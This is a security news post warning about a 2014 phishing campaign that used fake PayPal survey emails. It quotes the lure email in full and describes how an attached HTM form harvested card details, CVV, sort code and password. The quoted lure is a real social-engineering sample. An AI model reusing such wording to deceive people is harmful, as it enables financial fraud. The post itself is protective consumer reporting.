Phishing Alert: PayPal Is Launching a New Survey Program

PayPal phishing email

Cybercriminals are trying to trick unsuspecting Internet users into handing over their personal and financial information with the aid of fake PayPal emails, which claim that the payment processor has launched a new survey program.

It starts with an email that reads something like this:

“As today 23 February 2014, PayPal is launching a new survey program. All customers are welcome to participate this survey. The survey will take 5 minutes and for your effort and understanding PayPal will select most of the customers that takes this survey and reward them with £25.00 GBP.

It would be helpful if you fill it out right now. If that is not possible, please do it soon. We plan to close the survey on 23 February 2014, so do not delay. Please note that all responses will be confidential.

To start completing the Survey please download the attachement form and follow the steps to open a secure browser window.”

Security experts from Malwarebytes have analyzed this scheme. They warn that the archive file attached to the emails,, contains an HTM page that instructs users to answer a few questions.

The answers to these questions are not important. What is important, at least for the cybercriminals running this scam, is that users enter the information in the second part of the form.

Victims are asked to hand over their name, address, city, postal code, date of birth, payment card number, expiration date, CVV, sort code, and password.

The submitted information is transmitted to a server controlled by the cybercriminals. These details can be more than enough for the crooks to perform fraudulent transactions with victims’ credit cards.

In case you come across such emails, remember that PayPal will never ask for such information via email.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s